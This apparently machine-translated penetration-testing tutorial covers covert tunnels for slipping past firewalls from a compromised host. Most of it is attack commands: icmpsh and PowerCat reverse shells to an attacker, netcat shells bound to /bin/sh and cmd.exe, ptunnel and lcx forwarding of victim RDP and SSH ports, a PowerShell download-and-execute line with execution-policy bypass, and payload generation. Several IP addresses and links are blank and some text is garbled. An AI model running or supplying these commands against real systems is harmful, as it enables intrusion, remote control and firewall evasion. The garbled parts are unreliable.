Penetration tests(Intranet ):hidden communication tunnel technology (part 1)

What is a tunnel?
In actual networks, various border devices, software/hardware firewalls and even intrusion detection systems are usually used to check external connections. If abnormalities are found, the communication will be blocked. So what is a tunnel? The tunnel here is a communication method that bypasses port shielding. The data packets at both ends of the firewall are encapsulated by the packet types or ports allowed by the firewall, and then pass through the firewall to communicate with each other. When the encapsulated data packet reaches the destination, the data packet is restored, and the restored data packet is sent to the corresponding server.

There are three commonly used tunneling technologies:

Network layer: IPv6 tunnel, ICMP tunnel

Transport layer: TCP tunnel, UDP tunnel, conventional port forwarding

Application layer: SSH tunnel, HTTP/S tunnel, DNS tunnel

First judge the intranet connectivity
Judging the connectivity of the internal network refers to judging whether the machine can access the external network, etc. (Comprehensive judgment of various agreements) The methods of each agreement are as follows:

1. TCP protocol

Use “Swiss jundao”-netcat

Execute the nc command: nc <IP> <port>.

2. HTTP protocol

Use the “curl” tool to execute the curl <IP address: port> command. If the remote host opens the corresponding port and the internal network can connect to the external network, the corresponding port information will be output.

3. CIMP protocol

Use the “ping” command to execute ping <IP address/domain name>.

4. DNS protocol

Commonly used commands to check DNS connectivity are “nslookup” and “dig”.

nslookup is the DNS detection command that comes with windows, execute:

  1.  nslookup vps-ip
  2. nslookup     // If no server is specified, the default DNS server will be used

dig is the DNS detection command that comes with the Linux system, execute:

  1. dig @vps-ip
  2. dig          // If no server is specified, the default DNS server will be used

Network layer tunneling technology
IPv6 tunnel
IPv6 tunnel technology refers to the technology of transmitting IPv6 data packets through an IPv4 tunnel. In order to transmit IPv6 information in the IPv4 ocean, IPv4 can be used as a tunnel carrier, and IPv6 packets can be encapsulated in IPv4 data packets. IPv6 packets can pass through the IPv4 ocean and reach another IPv6 island.

The process of encapsulating IPv6 in IPv4 is similar to the encapsulation of other protocols: the node at one end of the tunnel uses the IPv6 datagram as the payload data in the IPv4 packet to be sent to the node at the other end of the tunnel, thus generating the IPv4 data containing the IPv6 datagram Report flow. If both node A and node B are nodes that only support IPv6, and node A wants to send a packet to B, A simply sets the destination address of the IPv6 header to B’s IPv6 address, and then passes it to router X; X is used for IPv6 packets IPv4 is encapsulated, and then the destination address of the IPv4 header is set to the IPv4 address of router Y; if router Y receives this IPv4 packet, it will first unpack it. If it finds that the encapsulated IPv6 packet is sent to node B, Y will This packet is forwarded to B correctly.

Because border devices, firewalls and even intrusion prevention systems at this stage still cannot identify IPv6 communication data, and most operating systems support IPv6, manual configuration is required.

Attackers sometimes use malware to configure devices that allow IPv6 communication to avoid firewalls and intrusion detection systems.

Configure tunnels and automatic tunnels

The main difference between configuring a tunnel and an automatic tunnel is that an automatic tunnel is only feasible when the IPv6 address of the node performing the tunnel function is an IPv4-compatible address. When establishing an IP address for a node that performs the tunnel function, the automatic tunnel method does not need to be configured; while the configuration tunnel method requires the end node of the tunnel to use other mechanisms to obtain its IPv4 address, such as using DHCP, manual configuration or other IPv4 configuration mechanisms.

Tunnel tools that support IPv6 include socat, 6tunnel, nt6tunnel, and so on.

ICMP tunnel
In the ICMP communication protocol, the two devices on both sides of the communication do not need to open the port to proceed, but in the general communication protocol, it is necessary to open the port. The most common ICMP protocol message is the reply to the ping command. The attacker can use the command line to get more ICMP requests than reply.

In some network environments, if an attacker uses various upper-layer tunnels (such as HTTP tunnels, DNS tunnels, conventional port forwarding, etc.) to perform operations that fail, the firewall will not block ping packets, so they will often access through the ping command The remote host tries to establish an ICMP tunnel and encapsulates the TCP/UDP data into an ICMP ping packet, so as to pass through the firewall to achieve unrestricted network access.

Let me introduce the commonly used ICMP tunnel tools.


The icmpsh tool is a simple ICMP reverse shell tool. It can be cross-platform and does not require administrator rights when running.

Download link:

To run, you need to install the impacket library of Python in order to access tcp, udp, icmp, igmp, arp, ipv4, ipv6, smb, etc.

When icmpsh is running, because it replaces the response program of the ping command of the system itself, you need to execute the following command to close the ICMP response of the local system, otherwise the shell obtained is unstable:

sysctl -w net.ipv4.icmp_echo_ignore_all=1    // Reset to 0

Actual combat:

The attacker vps simulated public IP:

The victim simulated public IP:

The attacker enters in the project directory on the server side:

  1. python
  2.  python Attacker ip victim ip

Or enter ./ to run the program, and then remind you to enter the victim’s public network ip, and you will be given the command to execute on the victim’s host.

Upload icmpsh.exe to the victim host and execute the command:

icmpsh.exe -t -d 500 -b 30 -s 128

You can see the victim’s shell on the attacking machine:

imcpsh.exe parameters:

  1. -t host ip address, used to send ping requests to it. This option is mandatory!
  2. -r Send a single test icmp request containing the string, and then exit. This is for testing the connection.
  3.  -d Delay between requests in milliseconds (in milliseconds)
  4.  -o Response timeout in milliseconds (in milliseconds). If the reply is not received in time, the slave station will increase a blank counter. If the counter reaches the limit, the slave will exit. If a response is received, the counter is set back to 0
  5. -b Space limit (icmp requests that have not been answered before logout
  6.  -s Maximum data buffer size in bytes (in bytes)

In the actual penetration test, how do we know the public network IP of the victim machine? Strictly speaking, this IP should be the IP seen by the server. In order to get this IP, you can ping the vps from the internal network terminal. Use tcpdump icmp or The tcpdump -i eth0 icmp command monitors and obtains this ip, and then fill in it.


Pingtunnel is also a commonly used ICMP tunnel tool, which can be cross-platform. 4. When using, you can set a password for the tunnel to prevent the tunnel from being abused.

Download link:

Let’s do a test. The test environment is as follows:

  1. Attacker vps
  2. Simulate public network IP:
  3.  Web server
  4. Simulate public network IP:
  5. Intranet IP:
  6. Database server
  7. Intranet IP:

Suppose we have obtained the web server’s authority and continue to infiltrate the intranet, but the attacker cannot access the database server ( located on the intranet. The web server cannot directly access the database server, but it can be accessed through the ping command. Then we can use the web server as a springboard to establish an ICMP tunnel to penetrate the intranet.

First upload the ptunnel program on the victim web server and execute it:

ptunnel -x whoami

The attacker executes on vps:

ptunnel -p -lp 1080 -da -dp 3389 -x whoami

The meaning of the above command is: when accessing the 1080 port of the attacker vps (, the data of port 3389 of the database server ( will be encapsulated in the ICMP tunnel, and the web server is used as the ICMP tunnel Springboard for transmission. In the whole process, the Web server is a border server, which acts as a springboard for data forwarding.

Finally, access the local 1080 port on the attacker’s vps to establish a connection with the 3389 port of the database server:

Parameters of ptunnel:

  1. x: Specify the password for the ICMP tunnel connection
  2.  -lp: Specify the local TCP port that the attacker wants to listen on
  3.  -da: Specify the IP address of the third-party target machine to be forwarded
  4.  -dp: Specify the TCP port of the third-party destination to be forwarded
  5. -p: Specify the IP address of the machine at the other end of the ICMP tunnel
ptunnel -p -lp 1080 -da -dp 22 -x whoami
ssh administrator@ -p 1080
It is also possible to forward port 80 of the web service of the intranet target server to the attacker’s local:
ptunnel -p -lp 8000 -da -dp 80 -x whoami
  1. echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all #Disable icmp reply
  2. ./icmptunnel -s #monitor
  3. Reopen a command line window
  4. ifconfig tun0 netmask #Add the tun0 network card and assign the tunnel address to

Victim machine (client):
  1. echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all #Disable icmp reply
  2. ./icmptunnel #Connect to the server
  3. Reopen a command line window
  4. ifconfig tun0 netmask #Add tun0 network card, assign tunnel address
n this way, the client and server have opened an ICMP tunnel. The server side is and the client side is On the server, try to connect to the client via SSH. Note that you need to use the tunnel ip address for SSH connection:
The client connects to the server:

Transport layer tunneling technology
In the penetration test, if the firewall of the intranet blocks access to the specified port, after obtaining the permission of the target machine, you can use the firewall command to open the specified port or close the firewall. If there are a series of defense systems in the intranet, TCP and UDP traffic will be intercepted in large numbers.

lcx port forwarding
lcx is a very classic port forwarding tool, which is based on Socket and has two versions for Windows and Linux. Lcx.exe for Windows and portmap for Linux.

Download link:

A normal socket socket must have two ends: one end is the server, listening to a port, waiting for the client to connect; the other end is the client, which establishes a connection with the server by giving the server’s IP and port.

Intranet port forwarding

Execute the following command on the victim machine (Windows) to forward the data of port 3389 of the victim machine to port 8000 of the attacker’s public network VPS (Windows).

 lcx.exe -slave <Attacker ip> 8000 3389

Execute the following commands on the attacking machine to forward the data monitored on port 8000 of the local machine to port 4444 of the local machine.
lcx.exe -listen 8000 4444
Now you can log in. Use remote desktop to log in <attacker’s local ip>:4444, you can access the victim’s remote desktop on port 3389.

Use portmap on Linux system:

First execute on the attacking machine with public network ip:

  1. ./portmap -m 2 -p1 23 -h2 -p2 2333
  2.  ​
  3.  ./portmap -m 2 -p1 23 -h2 Public network host ip -p2 2333
Means to listen to requests from port 23 and forward them to port 2333

There is a -m parameter. Explanation of this parameter: In which way to use this tool, then there are three ways below

1. Monitor port1 and connect to port2 of host2. 2. Monitor port1 and port2. 3. Connect the port corresponding to host1 and the port corresponding to host2


  1. ./portmap -m 3 -h1 -p1 22 -h2 -p2 23
  2. ./portmap -m 3 -h1 -p1 22 -h2 Public network host ip -p2 23
Then the attacker can connect locally with the ssh command:

Local port forwarding

If the target server cannot pass the data of some ports (such as 3389, 22) due to firewall restrictions, we can forward the data of the corresponding port of the target server to the ports allowed by other firewalls. Execute the following commands on the victim machine to transparently transmit the target port 3389 to port 1080 of the target machine:

lcx.exe -tran 1080 3389

netcat-Swiss jundao
Download link:

Use nc to get shell

(1) Forward shell


  1. nc -ldp 4444 -e /bin/sh //linux
  2. nc -ldp 4444 -e c:\windows\system32\cmd.exe //windows

The whole process is: first connect the web server to the attacker, and then connect to the database server located on the intranet at the moment of connection. The web server is the border server and is only used as a communication relay.


PowerCat is the powershell version of nc, which is similar to nc. It can be uploaded to the target machine for local execution, or it can be downloaded to the target machine and executed in the memory.

Download link:

Use PowerCat as a springboard:

The test environment is as follows:

  1. Attacker vps
  2. Simulate public network IP:
  3. Windows 7
  4. Simulate public network IP:
  5. Intranet IP:
  6. Windows Server 8
  7. Intranet IP:
powershell -ExcutionPolicy bypass -Command "&{Import-Module C:\powercat.ps1;powercat -l -v -p 9999 -e c:\windows\system32\cmd.exe}"

Then execute the following command on Windows 7:

  1. powershell -ExcutionPolicy bypass IEX(New-Object Net.WebClient).DownloadString(“”);powercat -l -v -p 8000 -r tcp:
  2. // -r:Data forwarding
nc -vv 8000

You can get the Windows Server 8 shell on the attacker’s host:

The operation here is that the forward shell will be restricted by the firewall and is unsuccessful. You can use the command to turn off the firewall of the victim machine.

Reverse shell:

Attack host

nc -l -p 8888 -vv

Victim host

powercat -c <攻击者IP> -p <攻击者端口> -e C:\windows\system32\cmd.exe

Rebound PowerShell:

If you want to rebound powershell, you must use powercat at both ends.

Attack host

powercat -l -v -p 4444 

Victim host

  1. powercat -c <attacker IP> -p <attacker port> -v -ep
  2. // -ep: Used to Rebound powershell

Generate payload with PowerCat

  1. Forward:
  2. powercat -l -p 4444 -e c:\windows\system32\cmd.exe -v -g >> shell.ps1
  3. Reverse:
  4. powercat -c <attacker IP> <attacker port> -v -e c:\windows\system32\cmd.exe -g >> shell.ps1


There are no reviews yet.

Be the first to review “Penetration tests(Intranet ):hidden communication tunnel technology (part 1)”

Your email address will not be published. Required fields are marked *